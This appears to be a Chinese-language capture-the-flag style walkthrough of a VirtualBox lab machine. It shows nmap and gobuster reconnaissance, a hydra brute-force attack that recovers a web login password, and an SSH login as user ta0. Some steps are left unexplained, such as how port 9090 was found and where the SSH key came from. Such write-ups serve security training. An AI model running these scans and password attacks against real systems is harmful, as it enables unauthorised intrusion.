┌──(root㉿kali)-[~/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:18 +0800 Nmap scan report for 192.168.2.1 Host is up (0.00048s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00059s latency). MAC Address: 08:00:27:ED:AA:8A (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.68 Host is up (0.00060s latency). MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 7.52 seconds
靶机IP:192.168.2.68
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.68 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:19 +0800 Nmap scan report for 192.168.2.68 Host is up (0.0011s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.68 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:19 +0800 Nmap scan report for 192.168.2.68 Host is up (0.00067s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: Service Unavailable |_http-server-header: Apache/2.4.62 (Debian) MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router|storage-misc Running (JUST GUESSING): Linux 4.X|5.X|6.X|2.6.X|3.X (93%), MikroTik RouterOS 7.X (93%), Synology DiskStation Manager 5.X (85%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 Aggressive OS guesses: Linux 4.15 - 5.19 (93%), Linux 4.19 (93%), Linux 5.0 - 5.14 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 6.0 (92%), Linux 5.4 - 5.10 (87%), Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 (87%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds
3.udp扫描
1 2 3 4 5 6 7 8 9 10
┌──(root㉿kali)-[~/miaosec] └─# nmap -sU --top-ports 100 192.168.2.68 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:20 +0800 Nmap scan report for 192.168.2.68 Host is up (0.00092s latency). All 100 scanned ports on 192.168.2.68 are in ignored states. Not shown: 100 open|filtered udp ports (no-response) MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds
二、WEB渗透
1、HTTP 服务枚举
访问80端口,提示Bruteforce Node-1 目前正在进行固件升级。
2、目录扫描
尝试进行目录扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
┌──(root㉿kali)-[~/miaosec] └─# gobuster dir -u http://192.168.2.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak =============================================================== Gobuster v3.8.2 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.68 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8.2 [+] Extensions: bak,php,html,js,txt [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== index.html (Status: 200) [Size: 1069] maintenance.html (Status: 200) [Size: 1884]
┌──(root㉿kali)-[~/miaosec] └─# nmap -p 9090 192.168.2.68 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:45 +0800 Nmap scan report for 192.168.2.68 Host is up (0.00059s latency).
PORT STATE SERVICE 9090/tcp open zeus-admin MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
使用kali进行访问9090端口
发现是一个登录框,尝试进行爆破
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kali)-[~/miaosec] └─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.68 -s 9090 http-post-form "/:username=^USER^&password=^PASS^:Invalid" Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-04 23:07:07 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://192.168.2.68:9090/:username=^USER^&password=^PASS^:Invalid [9090][http-post-form] host: 192.168.2.68 login: admin password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-04 23:07:43
┌──(root㉿kali)-[~/miaosec] └─# ssh -i ssh_login_key ta0@192.168.2.68 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html Linux bruteforce 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Jan 25 07:16:48 2026 from 192.168.56.104 -bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) ta0@bruteforce:~$ id uid=1000(ta0) gid=1000(ta0) groups=1000(ta0)